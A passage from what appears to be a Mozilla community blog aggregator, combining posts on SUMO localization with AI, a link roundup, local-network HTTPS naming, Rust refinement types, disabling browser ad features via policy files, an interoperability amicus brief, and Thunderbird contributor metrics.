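As a rough illustration of the general technique of prompting an LLM to respect existing translations (the actual SUMO prompts and tooling are not public, so the function, wording, and glossary here are entirely assumed):

```python
# Hypothetical sketch of building a localization prompt that pins down
# approved translations so the model reuses them instead of inventing
# new renderings. Not Mozilla's actual prompt; for illustration only.

def build_l10n_prompt(source: str, locale: str, glossary: dict) -> str:
    """Assemble a prompt that embeds approved term translations."""
    terms = "\n".join(f'- "{en}" -> "{tr}"' for en, tr in glossary.items())
    return (
        f"Translate the following support article segment into {locale}.\n"
        "Reuse the approved translations below verbatim; "
        "do not re-translate these terms:\n"
        f"{terms}\n"
        "Keep product names and UI labels unchanged.\n\n"
        f"Segment:\n{source}"
    )

prompt = build_l10n_prompt(
    "Click Settings to open the preferences page.",
    "de",
    {"Settings": "Einstellungen"},
)
print(prompt)
```

The design choice worth noting is that the glossary travels inside the prompt, so consistency with prior human translations is enforced per request rather than hoped for from the model.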

Here’s what’s important: contributors will always be at the heart of our localization efforts. AI-powered localization is designed to support and amplify your work, not replace it. By speeding up the process and filling in gaps, the AI will help ensure more consistent translations and give contributors more time to focus on fine-tuning and reviewing content.

Together, these AI-driven tools are helping us create smarter, more accessible content and ensure users worldwide get the support they need.

Why this matters: Mozilla’s mission in action

At Mozilla, our work is guided by the Mozilla Manifesto, a promise to build an open and accessible internet that puts people first. Every initiative we worked on this year reflects that mission:

  • Reducing cognitive load makes support resources more inclusive, helping people of all skill levels solve problems with ease.
  • The Voice of Customer program ensures that user feedback actively shapes Mozilla’s products and support efforts.
  • Organa Oracle and our localization AI make content creation and translation faster while keeping accessibility, quality, and human collaboration at the center.

By simplifying and improving how we support users, we’re making it easier for everyone to feel confident and empowered on the web.

Thank you for an amazing year

None of this would have been possible without you, our incredible contributors, team members, and the wider Mozilla community. Your work, ideas, and feedback are what make SUMO a place where users can always find the help they need.

As we head into 2025, we are excited to keep building on this year’s progress. We will continue amplifying user voices, reducing complexity, improving accessibility, and exploring new ways to make support content even better.

Thank you for being part of this journey. Here is to another year of collaboration, growth, and making the internet better for everyone.

Let’s keep building a better web, one article at a time.

Don Martilinks for Christmas 2024

More stuff to read on the Internet.

Also, Quora Lies: WW2 Arial, Helvetica, Courier; also Times misinformation (More and more wrong answers out there, in easy to find places. Somehow, people will have to change content discovery habits to deal with scam culture and AI slop, but we don’t know how. IMHO the need for user research is greater than ever.)

[What say you, Spock?] My Proposed Terminology to Describe Bypassing Social Media Face ID Age Verification Systems (Interesting premise but are kids going to pick up hacking habits again? Kids back in the early days of the Internet had to hack because IT was rare, expensive, and flaky. But people who developed their Internet habits in the 2000s-2010s had it easy, because stuff was basically working but companies were still in create more value than you capture mode. I suppose kids today will have to learn to hack, not just because of age verification stuff but because companies are in permanent hustle/growth hacking/value extraction mode, so the value available to the default user is less. Hack the consumer surplus?)

Step Right Up: The Chamber of Progress’s Ticketing Chamber of Horrors Fools Nobody (more news from the world of scam culture. Tech industry out of ideas? No problem, take low-reputation petty crimes like ticket scalping and scale them.)

Why Agentic AI Could Be Doomed To Fail, and 3 More AI Predictions for 2025 Accuracy of 75%-90% is state-of-the-art for AI….But if you have three steps of 75-90% accuracy, your ultimate accuracy is around 50%.

Linden Lab has spent $1.3B building Second Life and paid $1.1B to creators And since Linden Lab shares 90% of transactions with creators and only takes a 10% cut, the vast majority of the money generated through trade is paid to the creators themselves.

Classified fighter jet specs leaked on War Thunder – again (Do Wargaming.net players just take the games less seriously? This never seems to happen to the World of… games.)

The Ugly Truth About Spotify Is Finally Revealed Around this same time, I started hearing jazz piano playlists on Spotify that disturbed me. Every track sounded like it was played on the same instrument with the exact same touch and tone. Yet the names of the artists were all different….By total coincidence, Spotify’s profitability started to improve markedly around this time. and The Ghosts in the Machine, by Liz Pelly

Joey Hess: aiming at December The design goal of my 12 kilowatt system is to produce 1 kilowatt of power all day on a cloudy day in midwinter, which allows swapping between major loads (EV charger, hot water heater, etc) on a cloudy day and running everything on a sunny day. So the size of the battery bank doesn’t matter much. Batteries are getting cheaper fast too, but they are a wear item, so it’s better to oversize the solar system and minimize the battery….It costs more to mount solar panels now than the panels are worth.

Enrico Zini: New laptop setup (related: mine came up with fan and power light but no display, got helpful support)

Martin ThompsonExpanding what HTTPS means

So you have a device, maybe IoT, or just something that sits in a home somewhere. You want to be able to talk to it with HTTPS.

Recall Zooko’s “meaningful, unique, decentralized” naming trichotomy. HTTPS chooses to drop “decentralized”, relying on DNS as central control.

In effect, HTTPS follows a pretty narrow definition. To offer a server that works, you need to offer a TLS endpoint that has a certificate that meets a pretty extensive set of requirements. To get that certificate, you need a name that is uniquely yours, according to the DNS[1].

Unique names

It is entirely possible to assign unique names to devices. There’s an awful lot of IoT thingamabobs out there, but there are far more names than we could ever use. Allocation can even be somewhat decentralized by having manufacturers manage the assignment[2].

The problem with unique names for IoT devices is that they are probably not going to be memorable (thanks Zooko). I don’t know about you, but printer.<somehash>.service-provider-cloud.example isn’t exactly convenient. Still, this is a system that is proven to work in real deployments.

If we want to make this approach work, maybe it just needs adapting. Following this approach, the problems we’d be seeking to solve are approximately:

  • How to make the names more manageable. For instance, securely distributing search suffixes is a significant problem.

  • How to distribute certificates. ACME is an obvious choice, but what does the device talk to? Obviously, there is some need for something to connect to the big bad Internet, but how and how often?

  • Whether rules about certificates that apply to big bad Internet services fit in these contexts. Is it OK that you need to get fresh certificates every 45 days? How do Certificate Transparency requirements fit in this model? Does adding lots of devices to the system lead to scaling problems?

These problems all largely look like operational challenges. Any protocol engineering toward this end would be aimed at smoothing over the bumps. Many of the questions even seem to have fairly straightforward answers.

I don’t want to completely dismiss this approach as infeasible, but it seems clear that there are some pretty serious impediments. After all, nothing has really prevented someone from deploying systems this way. Many have tried. That few have succeeded[3] is perhaps evidence in support of it being too hard.

.onion names

Tor’s solution to this problem is making names self-authenticating. You take a public key (something for which no one else can produce a valid signature) and that becomes your identity. Your server name becomes a hash of that public key. Of course, “<somelongstring>.onion” as a name is definitely not user-friendly. You won’t want to be typing that name into an address bar[4].

Binding the name to a key recognizes that the identity of the service is inseparable from its name. In the world of DNS names, that binding is extrinsic and validated by a CA. In Tor, that binding is intrinsic: the name itself carries it.

Tor requires that endpoints follow different rules from the rest of the uniquely-named servers. Those rules include a particular protocol and deployment. Because those rules are a bit onerous, only a few systems are able to resolve “.onion” names. However, this approach does suggest that maybe there is an expansion to the definition of HTTPS that can be made to work.

.local with cryptographically bound names

The same concept as Tor could be taken to local names. Using “<somehash>.local” could be an option[5], the idea being that the name is verified differently but is still unique.

A name that is cryptographically verified means that you could maybe drop some of the requirements you might otherwise apply to “normal” names.
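One way to derive such a name, mirroring the .onion approach (the label format here is my illustration, not any standard):

```python
import base64
import hashlib

def local_name(pubkey: bytes) -> str:
    """Derive a self-authenticating mDNS-style name from a public key.

    Hash the key, truncate, base32-encode: the client can re-derive
    the name from the key the server presents in the TLS handshake,
    so the binding between name and key needs no third party.
    """
    digest = hashlib.sha256(pubkey).digest()[:20]
    label = base64.b32encode(digest).decode().lower().rstrip("=")
    return f"{label}.local"

# Different keys give different names, so (up to hash collisions)
# no one can claim your name without holding your key.
name = local_name(b"-----example public key bytes-----")
```

Verification then reduces to recomputing the label from the presented key and comparing it with the name that was dialed.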

The trick here is that you are asking clients to change a fair bit. Maybe less than Tor demands, but they still need to recognize the difference. Servers also need to understand that their name has changed.

The biggest problem with relying on unique names remains: these aren’t going to be easy to remember and type.

Nicknames

One approach for dealing with ugly names is to add nicknames. In a browser, you might have a bookmark labeled “printer”, which navigates to your printer at “<somehash>.local”. Or maybe you edit /etc/hosts to add a name alias.

Either way, usability depends on the creation of a mapping from the friendly name to the unfriendly one. From a security perspective, the mapping becomes a critical component.

The idea that you might receive this critical information from the network – for example, the DHCP Domain Search Option – is no good. We have to assume that the network is hostile[6].

The real challenge here is that everyone will have their own nicknames, so there can be no canonical mapping. My printer and your printer are (probably) different devices, but we might want to use the same nickname.

TOFU and nicknames

Of course, in most of these cases, what you get from a system like this is effectively TOFU (trust on first use).

That is, you visit the server the first time and give it a friendly name. If that first visit was to the correct server, you can use the nickname securely thereafter. If not, and an attacker was present for your first visit, then you could be visiting them forever after.

This model works pretty well for SSH. It can also be hardened further if you care to do the extra work.

It’s a bit rough if the server key changes, which leads to some fair criticism. For use in the home, it might be good enough.
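The TOFU scheme can be sketched in a few lines, in the style of SSH’s known_hosts (the pin store and fingerprint format here are illustrative assumptions):

```python
import hashlib

# nickname -> pinned key fingerprint, analogous to ~/.ssh/known_hosts
pins: dict[str, str] = {}

def fingerprint(pubkey: bytes) -> str:
    return hashlib.sha256(pubkey).hexdigest()

def verify(nickname: str, pubkey: bytes) -> str:
    fp = fingerprint(pubkey)
    if nickname not in pins:
        pins[nickname] = fp   # first visit: pin whatever key we see
        return "pinned"
    # later visits: any change in the key is treated as a possible attack
    return "ok" if pins[nickname] == fp else "key-mismatch"
```

The "key-mismatch" case is exactly the rough edge described above: a legitimate key change and an attack look identical, and the system can only surface the discrepancy, not resolve it.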

Non-unique names, unique identities

Recognizing the practical effect of nicknames plus cryptographically-bound names, the logical next step is to just do away with the funny name entirely.

The reason we want the long and awkward label is twofold:

  • Firstly, we need to be able to find the thing and talk to it.

  • Then, we need to ensure that it has a unique identity, distinct from all other servers, so that it cannot be impersonated.

Those two things don’t need to be so tightly coupled.

Finding the thing works perfectly well without a ridiculous name. I would argue that mDNS works better for people if it uses names that make sense to them.

We could use the friendly name where it makes sense and an elaborate name – or identifier – everywhere that impersonation matters.

Managing impersonation risk

If there are potentially many printers that can use “printer.local”, how do we prevent each from impersonating any other? The basic answer is that each needs to be presented distinctly.

In the browser

On the web at least, this could be relatively simple. There are two concepts that are relevant to all interactions:

  • An origin. An origin is a tuple of values that are combined to form an unambiguous identifier. Origins are the basis for all web interactions. For ordinary HTTPS, this is a tuple that combines the scheme or protocol (“https”), the hostname (“www.example.com”), and the server port number (443).

  • A site. Certain features combine multiple origins for reasons that are convoluted and embarrassing. A site is defined as a test, rather than a tuple of values. Two origins can be same site or schemelessly same site.

Neither of these rely on having flat names for servers, which makes extending them a real possibility. For instance, “https://printer.local” might be recognized as non-unique and therefore be assigned a tuple that includes the server public key, thereby ensuring that it is distinct from all other “https://printer.local” instances.
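One way to picture the extended tuple (the extra field is my sketch, not anything the post or a spec defines):

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Origin:
    scheme: str
    host: str
    port: int
    key_hash: Optional[str] = None  # set only for non-unique names like *.local

# Ordinary HTTPS origin: the key plays no part in identity.
web = Origin("https", "www.example.com", 443)

# Two printers sharing the name "printer.local" but holding different keys
# are distinct origins, so cookies and passkeys cannot leak between them.
mine = Origin("https", "printer.local", 443, key_hash="ab12...")
theirs = Origin("https", "printer.local", 443, key_hash="cd34...")
```

Since the key hash participates in equality, everything keyed off the origin (cookie jars, passkey scopes, storage partitions) automatically separates the two instances.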

From there, many of the reasons for impersonation can be managed. Passkeys, cookies, and any other state that a browser associates with a given “https://printer.local” are only presented to that instance, not any other. That’s a big chunk of the impersonation risk handled.

Passwords and phishing remain a challenge[7]. Outside of the use of a password manager, it won’t be hard to convince people to enter a password into the wrong instance. That might be something that can be managed with UX changes, but that’s unlikely to be perfect.

Elsewhere

Outside of the browser, there are a lot of systems that do not update in quite the same fashion as browsers. Their definition of server identity is likely to be less precise than the origin/site model browsers use.

For these, it might be easier to formulate a name that includes a cryptographic binding to the public key. That name could be used in place of the short, friendly name. There are reserved names that can be used for this purpose.

Working out how to separate out places where names need to be unique and where they can be user-friendly isn’t that straightforward. A starting point might be to use an ugly name everywhere, with substitution of nicer names being done surgically.

One place that might need to be tweaked first is the protocol interactions. A printer might easily handle being known as “printer.local”, but be less able to handle being known as “<somehash>.whatever.example”. Keeping the short name on the wire would keep the changes for servers to a minimum.

Key rotation and other problems

One reasonable criticism of this approach is that no mechanisms exist to support servers changing their keys.

That’s mostly OK. Key rotation will mean a new identity, which resets existing state. Losing state is likely tolerable for cookies and passkeys. The phishing risk of having to enter a password to restore state, on the other hand, is pretty bad.

That’s a genuine problem that would need work. Of course, if the alternative is no HTTPS, it might be a good trade.

Servers in these environments probably shouldn’t be rotating keys anyway. Things like expiration of certificates largely only serve to ensure that servers are equipped to deal with change. A server at a non-unique name doesn’t have to deal with its name disappearing or having to renew it periodically. Those that want to deal with all of that can get a real name.

Of course, this highlights how this would require a distinct set of rules for non-unique names. Working out what these differences need to be is the hard part.

Conclusion

Extending the definition of HTTPS to include non-unique names is potentially a big step. However, it might mean that we can do away with the bizarre exceptions we have for unsecured HTTP in certain environments.

This post sketched out a model that requires very little of servers. Servers only need to present a certificate over TLS, with a unique key. It doesn’t care much what those certificates contain[8]. Changes are focused on clients and what they expect from devices.

Allowing a system that is obviously lesser to share the “HTTPS” scheme with the system we know (and love/hate/respect/loathe/dread) might seem dishonest or misleading. I maintain that – as long as the servers with real names are unaffected, as they would be – no harm comes from a more inclusive definition.

Expanding what it means to be an HTTPS server might help eliminate unsecured local services. After all, cleartext HTTP is not fit for deployment to the Internet.


  1. Or, maybe, a globally unique IP address. Really, you don’t want that though. ↩︎

  2. Let’s pretend that the manufacturer isn’t going to go out of business during the lifetime of the widget. OK, I can’t pretend: this is unrealistic. Even if they stay in business, there is no guarantee that they will maintain the necessary services. ↩︎

  3. With some notable exceptions. ↩︎

  4. And good luck noticing the phishing attack that replaces the name. It’s not that hard for an attacker to replace the name with one that matches a few characters at the start and end. How do you think Facebook got “facebookcorewwwi.onion”? ↩︎

  5. You might use xx--<somehash>.local or some other reserved label to eliminate the risk, however remote, of collisions with existing names. ↩︎

  6. You hand your packets to the attacker to forward. ↩︎

  7. I should be recommending the use of passkeys here, pointing to Adam Langley’s nice book, but – to be perfectly frank – the user experience still sucks. Besides, denying that people use passwords is silly. ↩︎

  8. It might not be that simple. You probably want the server to include its name, if only to avoid unknown key share attacks. That might rule out the use of raw public keys. ↩︎

David TellerWhat would it take to add refinement types to Rust?

A few years ago, on a whim, I wrote YAIOUOM. YAIOUOM was a static analyzer for Rust that checked that the code was using units of measure correctly, e.g. a distance in meters is not a distance in centimeters, and dividing meters by seconds gives you a value in m / s (aka m * s^-1).

YAIOUOM was an example of a refinement type system, i.e. a type system that does its work after another type system has already done its work. It was purely static, users could add new units in about one line of code, and it was actually surprisingly easy to write. It also couldn’t be written within the Rust type system, in part because I wanted legible error messages, and in part because Rust doesn’t offer a very good way to specify that (m / s) * s is actually the same type as m.
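The same-unit part is easy to encode inside Rust with phantom types; what the language lacks is a good way to normalize expressions like (m / s) * s back to m, which is part of why an external checker was attractive. A minimal sketch of the phantom-type encoding (illustrative only, not YAIOUOM’s actual API):

```rust
use std::marker::PhantomData;

// Unit marker types; they exist only at the type level.
struct Meters;
struct Seconds;

// A value tagged with a unit; the tag is erased at runtime.
struct Qty<U>(f64, PhantomData<U>);

impl<U> Qty<U> {
    fn new(v: f64) -> Self {
        Qty(v, PhantomData)
    }
}

// Addition is only defined when the units match,
// so adding meters to seconds fails to compile.
impl<U> std::ops::Add for Qty<U> {
    type Output = Qty<U>;
    fn add(self, rhs: Self) -> Self::Output {
        Qty::new(self.0 + rhs.0)
    }
}

fn main() {
    let d = Qty::<Meters>::new(3.0) + Qty::<Meters>::new(4.0);
    assert_eq!(d.0, 7.0);
    // let bad = Qty::<Meters>::new(1.0) + Qty::<Seconds>::new(1.0); // type error
    let _ = Qty::<Seconds>::new(1.0);
    println!("d = {} m", d.0);
}
```

Extending this to division and multiplication means tracking exponents per unit in the type, which is where the in-language approach starts producing the illegible error messages mentioned above.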

Sadly, it also worked only on a specific version of Rust Nightly, and the code broke down with every new version of Rust. It’s a shame, because I believe that there’s lots we could do with refinement types. Simple things such as units of measure, as above, but also, I suspect, we could achieve much better error messages for complex type-level programming, such as what Diesel is doing.

It got me wondering what it would take to extend Rust so that refinement types could be easily added on top of the language.

Don Martiturning off browser ad features from the command line

(Previously: Google Chrome ad features checklist, turn off advertising features in Firefox.)

The Mozilla Firefox and Google Chrome browsers both have built-in advertising features, which I generally turn off because putting advertising features, even privacy-enhancing ones, in browsers is a bad idea. But the problem with going in to the settings and changing things is not just that it takes time to find stuff, but that it only affects the one browser profile you’re in. So every time I add a user account or a new browser profile, I still need to go to Settings and change the defaults again.

Fortunately it’s possible to turn the ad stuff off once and have it stay off. Both browsers have enterprise management features.

With a few commands, you can be your own enterprise manager, put the right file in the right location, and not have to worry about it.

On Linux, the following content should go in /etc/firefox/policies/policies.json for Firefox:

{
  "policies": {
    "Preferences": {
      "dom.private-attribution.submission.enabled": {
        "Status": "locked",
        "Type": "boolean",
        "Value": false
      },
      "browser.urlbar.suggest.quicksuggest.sponsored": {
        "Status": "locked",
        "Type": "boolean",
        "Value": false
      }
    }
  }
}

and the following content should go in /etc/opt/chrome/policies/managed/managed_policies.json for Chrome:

{
  "BlockThirdPartyCookies": true,
  "PrivacySandboxAdMeasurementEnabled": false,
  "PrivacySandboxAdTopicsEnabled": false,
  "PrivacySandboxPromptEnabled": false,
  "PrivacySandboxSiteEnabledAdsEnabled": false
}

The full list of available settings is at Chromium - Policy List. Some of these can be handy additions to the managed_policies.json file especially if you use multiple profiles. For example, I also add "DefaultBrowserSettingEnabled": false so that Google Chrome does not ask to be default browser.

Both files should be owned by the owner of the containing directory (root:root on my system) and mode 755.
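As a sketch of the workflow for the Chrome file (the staging and validation steps are my addition; a policies file that fails to parse will simply not be applied, so it is worth checking before installing):

```shell
# Stage the policy file in the current directory first.
cat > managed_policies.json <<'EOF'
{
  "BlockThirdPartyCookies": true,
  "PrivacySandboxAdMeasurementEnabled": false,
  "PrivacySandboxAdTopicsEnabled": false,
  "PrivacySandboxPromptEnabled": false,
  "PrivacySandboxSiteEnabledAdsEnabled": false
}
EOF
# Validate that it parses as JSON before relying on it.
python3 -m json.tool managed_policies.json > /dev/null && echo "policy JSON OK"
# Then, as root, install it at the Linux location from the post:
# sudo install -D -m 755 managed_policies.json \
#   /etc/opt/chrome/policies/managed/managed_policies.json
```

The same staging-and-validate pattern works for the Firefox policies.json; only the destination path differs.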

That’s it.

There are ways to set this stuff up on Mac OS, too. I think it’s supposed to be /Applications/Firefox.app/Contents/Resources/distribution/policies.json for Firefox, but the /etc/ location might also work. For Google Chrome, there are Set up Chrome browser on Mac instructions.

There are also mentions of how to manage these two browsers on Microsoft Windows. If someone who blogs about those two OSs has instructions on how to set this up on other OS, please let me know and I’ll link to your blog post.

  • For Mac OS: YOUR_BLOG_LINK_HERE

  • For Microsoft Windows: YOUR_BLOG_LINK_HERE

Appeasement fails, and one more tip

For about the past five years, a lot of proponents of in-browser ad features have been going on about how we really need to let the advertisers have their privacy-preserving advertising systems in the browser, because otherwise the surveillance business is going to do something worse. But, as we can see from recent news, that’s not how boundary testing works. They put the ad features in the browser, and then went ahead and increased fingerprinting anyway.

Browser developer: can we make the browser a little creepy so we don’t have to do worse stuff like fingerprinting?

User: ok, fine (clicks Got it)

Browser developer: well if you didn’t mind that, you won’t mind this…fingerprinting…either, right?

User: (facepalm)

Not a surprise for readers of relationship blogs, which tend to be more realistic about how to handle boundary testing than web development blogs. For example, Terri Cole writes about a constructive way to respond to boundary testing, in Navigating Boundaries: Strategies for Addressing Repeat Violations with Effective Consequences.

You’ve 1) set a boundary, 2) communicated it to them, and, after the boundary was crossed, 3) named a consequence to let them know, if this happens again, this is what I am doing.

Accepting any in-browser ad feature just encourages them to test boundaries again and make the browser incrementally creepier and more intrusive. Consequences need to happen early and predictably, or the person testing your boundaries learns that they can test further. Letting creepy behavior slide is a way to get more of it later.

How can users realistically communicate with big companies that only pay attention to lawsuits, news stories, and metrics measured in millions? You can’t really turn off browser fingerprinting—that’s the point, it’s based on hardware or software features that are hard for the user to change—but you can send a signal (and as a useful side effect protect yourself from nasty stuff like malvertising targeted based on your employer.) One of the best underrated privacy tips is just to visit https://myadcenter.google.com/home and set Personalized Ads to Off. This doesn’t just help protect yourself, it also (1) moves a metric that they track, so sends a message that they will get, and (2) it does reduce surveillance advertising revenue, so you help limit the flow of money to the other side. Turning this stuff off is not mainly about protecting yourself, it’s about helping at-risk people hide in the crowd and about reducing the incentives to invest in surveillance.

No privacy setting or tool is a total fix by itself, but turning off in-browser ad features and turning off personalization are both pretty effective for the time invested. More tips: effective privacy tips

Related

Google Chrome ad features checklist

turn off advertising measurement in Apple Safari

turn off advertising features in Firefox

dmarti/browser-adfraud-protection: RPM package to install a policies file

Bonus links

Companies issuing RTO mandates “lose their best talent”: Study (but it’s not about talent. When the company is increasing profits by more deception, surveillance, and value extraction from existing customers, then employees who can signal loyalty are more valuable than employees who might invent something new and legit, which is going to turn out to not get made because it doesn’t look as revenue-positive as the crime options anyway)

Surprise! California’s 40 Qs of Rising Minimum Wage & Fast Food Industry Growth (Beating USA) (There are a lot of possible reasons why the Econ 101 answer turns out not to be right in the real world. An hour of labor that the employer pays $20 for might be worth more than an hour done by the same person for $10.)

Ghost artists on Spotify (Sounds like AI slop blogs on ad networks to me)

Why Does U.S. Technology Rule? What I’m suggesting is that America’s tech advantage may bear considerable resemblance to Britain’s banking advantage. That is, it may have less to do with institutions, culture and policy than the fact that for historical reasons the world’s major technology hubs happen to be in the United States…

Feed readers which don’t take “no” for an answer (More results from a really useful tool. If, like me, your way to avoid The Algorithm is to make your own feed reader, go sign up to see if you have all the If-Modified-Since and related features working correctly.)

The rise of informal news networks, We’ll stop looking down on content creators, Media owners will protect the powerful, Content creators find a place in newsrooms Declaring platform independence (My favorites from the Nieman Lab end of year series. Related: Does YouTube have a future if its creators have to make money elsewhere? IMHO this helps make a case for the strength of the YouTube scene—if YouTubers can keep doing their thing even when the algorithm stifles and demonetizes them, they’re doing something right.)

Watchdog to issue new guidance after report finds air fryers may be listening (More reasons why I still aspire to be the guy who cooks with just a vintage cast-iron skillet and a razor-sharp chef’s knife)

The Rush for AI-Enabled Drones on Ukrainian Battlefields (related: For first time, Ukraine attacks Russian positions using solely ground, FPV drones)

Nodriver: A Game-Changer in Web Automation Designed to bypass even the most sophisticated anti-bot measures, Nodriver is a high-performance, asynchronous web automation framework tailored for developers who require a robust and reliable tool for scraping, testing, and automating web interactions. (previously, previously)

C.A. Goldberg, PLLC Turned Ten and We Are Looking Back at the Firm’s Most Memorable Moments Over the Past Decade!!! (Why Omegle is no longer a thing, and a substantial part of the reason that Section 230 is no longer a guaranteed everything is allowed if you can blame a user for uploading it rule.)

Trump2 Will Shake Up the “Competition Safe Spaces” What we know is that there is complete paralysis in Brussels as we start to take a measure of what may be coming our way – with decisions (DMA non compliance, Google ad-tech) and policy initiatives all stalled in the wings, all in suspended animation until the new Administration shows its true colours and we figure out what threats and retribution might be coming our way.

Australia fires publisher damages claim at Google, Australia approves law banning social media for under 16s (are they trying to grow a generation of teen Wikipedia editors and Fediverse influencers? might work)

Mozilla Privacy BlogMozilla Joins Amicus Brief Supporting Software Interoperability

UPDATE – December 20, 2024

We won!

Earlier this week the Ninth Circuit issued an opinion that thoroughly rejects the district court’s dangerous interpretation of copyright law. Recall that, under the district court’s ruling, interoperability alone could be enough for new software to be an infringing derivative work of some prior software. If upheld, this would have threatened a wide range of open source development and other software.

The Ninth Circuit corrected this mistake. It wrote that “neither the text of the Copyright Act nor our precedent supports” the district court’s “interoperability test for derivative works.” It concluded that “mere interoperability isn’t enough to make a work derivative.” Adding that “the text of the Copyright Act and our case law teach that derivative status does not turn on interoperability, even exclusive interoperability, if the work doesn’t substantially incorporate the preexisting work’s copyrighted material.”

Original post, March 11, 2024

In modern technology, interoperability between programs is crucial to the usability of applications, user choice, and healthy competition. Today Mozilla has joined an amicus brief at the Ninth Circuit, to ensure that copyright law does not undermine the ability of developers to build interoperable software.

This amicus brief comes in the latest appeal in a multi-year courtroom saga between Oracle and Rimini Street. The sprawling litigation has lasted more than a decade and has already been up to the Supreme Court on a procedural question about court costs. Our amicus brief addresses a single issue: should the fact that a software program is built to be interoperable with another program be treated, on its own, as establishing copyright infringement?

We believe that most software developers would answer this question with: “Of course not!” But the district court found otherwise. The lower court concluded that even if Rimini’s software does not include any Oracle code, Rimini’s programs could be infringing derivative works simply “because they do not work with any other programs.” This is a mistake.

The classic example of a derivative work is something like a sequel to a book or movie. For example, The Empire Strikes Back is a derivative work of the original Star Wars movie. Our amicus brief explains that it makes no sense to apply this concept to software that is built to interoperate with another program. Not only that, interoperability of software promotes competition and user choice. It should be celebrated, not punished.

This case raises similar themes to another high profile software copyright case, Google v. Oracle, which considered whether it was copyright infringement to re-implement an API. Mozilla submitted an amicus brief there also, where we argued that copyright law should support interoperability. Fortunately, the Supreme Court reached the right conclusion and ruled that re-implementing an API was fair use. That ruling and other important fair use decisions would be undermined if a copyright plaintiff could use interoperability as evidence that software is an infringing derivative work.

In today’s brief Mozilla joins a broad coalition of advocates for openness and competition, including the Electronic Frontier Foundation, Creative Commons, Public Knowledge, iFixit, and the Digital Right to Repair Coalition. We hope the Ninth Circuit will fix the lower court’s mistake and hold that interoperability is not evidence of infringement.

The post Mozilla Joins Amicus Brief Supporting Software Interoperability appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdOpen Source, Open Data: Visualizing Our Community with Bitergia

Thunderbird’s rich history comes with a complex community of contributors. We care deeply about them and want to support them in the best way possible. But how does a project effectively do just that? This article will cover a project and partnership we’ve had for most of a year with a company called Bitergia. It helps inform the Thunderbird team on the health of our community by gathering and organizing publicly available contribution data.


To better understand what our contributors need in order to be supported and successful, we sought the ability to gather and analyze data that would help us characterize the contributions across several aspects of Thunderbird. And we needed some data experts who understood open source communities to help us with this endeavor. From our relationship with Mozilla projects, we recalled a past partnership between Mozilla and Bitergia, who helped it achieve a similar goal. Given Bitergia’s fantastic previous work, we explored how Thunderbird could leverage their expertise to answer questions about our community. Likewise, you can read Bitergia’s complementary blog post on our partnership as well.

Thunderbird and Bitergia Join Forces

Thunderbird and Bitergia started comparing our data sources with their capabilities. We found a promising path forward on gathering data and presenting it in a consumable manner. The Bitergia platform could already gather information from some data sources that we needed, and we identified functionality that had to be added for some other sources. 

We now have contribution data sets gathered and organized to represent these key areas where the community is active:

  • Thunderbird Codebase Contributions – Most code changes take place in the Mercurial codebase with Phabricator as the code reviewing tool.  This Mercurial codebase is mirrored in GitHub which is more friendly and accessible to contributors. There are other important Thunderbird repositories in GitHub such as Thunderbird for Android, the developer documentation, the Thunderbird website, etc.
  • Bug Activity – Bugzilla is our issue tracker and an important piece of the contribution story.
  • Translations – Mozilla Pontoon is where users can submit translations for various languages.
  • User Support Forums – Thunderbird’s page on support.mozilla.org is where users can request support and provide answers to help other users.
  • Email List Discussions – Topicbox is where mailing lists exist for various areas of Thunderbird. Users and developers alike can watch for upcoming changes and participate in ongoing conversations.

Diving into the Dashboards

Once we identified the various data sets that made sense to visualize, Bitergia put together some dashboards for us. One of the key features that we liked about Bitergia’s solution is the interactive dashboard. Anyone can see the public dashboards, without even needing an account!

All of our dashboards can be found here: https://thunderbird.biterg.io/

All of the data gathered for our dashboards was already publicly available. Now it’s well organized for understanding too! Let’s take a deeper look at what this data represents and see what insights it gives us on our community’s health.

Thunderbird Codebase Contributions

As stated earlier, code contributions happen on our Mercurial repository, via the Phabricator review tool. However, the Bitergia dashboard gathers all its data from GitHub: the Mercurial mirror plus our other GitHub repositories. You can see the complete list of GitHub repositories considered at the bottom of the Git tab.

One of the most interesting things about the codebase contributions, across all of our GitHub repositories, is the breakdown of which organizations contribute. Naturally, most of the commits will come from people who are associated with Thunderbird or Mozilla. There are also many contributors who are not associated with any particular organization (the Unknown category).
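As a rough illustration of how such an organization breakdown can be derived, here is a minimal sketch using made-up commit records. The field names are assumptions for the example, not Bitergia’s actual schema (real dashboards map authors to organizations via curated affiliation data):

```python
from collections import Counter

# Hypothetical commit records; in practice these would come from the
# repository history with author affiliations attached.
commits = [
    {"author": "alice", "org": "Thunderbird"},
    {"author": "bob", "org": "Mozilla"},
    {"author": "carol", "org": None},  # no known affiliation
    {"author": "alice", "org": "Thunderbird"},
]

# Tally commits per organization, bucketing unaffiliated authors
# under "Unknown" as the dashboard does.
by_org = Counter(c["org"] or "Unknown" for c in commits)
print(by_org.most_common())
```

The same tally works at any scale; the interesting part in practice is curating the author-to-organization mapping, which is what services like Bitergia maintain.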

One thing we hope to see, and will be watching for, is the number of contributors outside the Thunderbird and Mozilla organizations increasing over time. Once the Firefox and Thunderbird codebases migrate from Mercurial to Git, that change will likely attract new contributors, and it will be interesting to see how those new contributions are spread across organizations.

Another insightful dashboard is the graph of incoming newcomers (on the Attracted Committers subtab). Over the last year, there has been a steady increase in the number of people committing to our GitHub repositories for the first time. This is great news and a trend we hope to continue to observe!
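The "attracted committers" metric itself is simple to compute: find the month of each author’s first commit, then count new authors per month. A minimal sketch with synthetic data (not Bitergia’s implementation):

```python
from collections import defaultdict

# (author, "YYYY-MM") pairs for each commit, in no particular order.
commits = [
    ("alice", "2024-01"), ("bob", "2024-01"),
    ("alice", "2024-02"), ("carol", "2024-02"),
    ("dave", "2024-03"), ("alice", "2024-03"),
]

# The first month each author appears is the month they were "attracted".
first_seen = {}
for author, month in sorted(commits, key=lambda c: c[1]):
    first_seen.setdefault(author, month)

# Count newcomers per month.
newcomers = defaultdict(int)
for month in first_seen.values():
    newcomers[month] += 1

print(dict(newcomers))  # {'2024-01': 2, '2024-02': 1, '2024-03': 1}
```

A rising series here is exactly the upward trend described above.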

Bug Activity

All codebases have bugs. Monitoring reported issues helps us gauge not only the stability of the project itself, but also who is contributing their time to report the issues they’ve seen. Perhaps we can even run some developer-requested test cases that help further resolve a user’s issue. Bug reporting is incredibly important and valuable, so it is obviously an area we were interested in. You can view the relevant dashboards on the Bugzilla tab.

Translations

Many newcomers’ first contribution to an open source project is a translation. For the Firefox and Thunderbird projects, Pontoon is the translation management system, and you can find translation contribution information on the Pontoon tab.

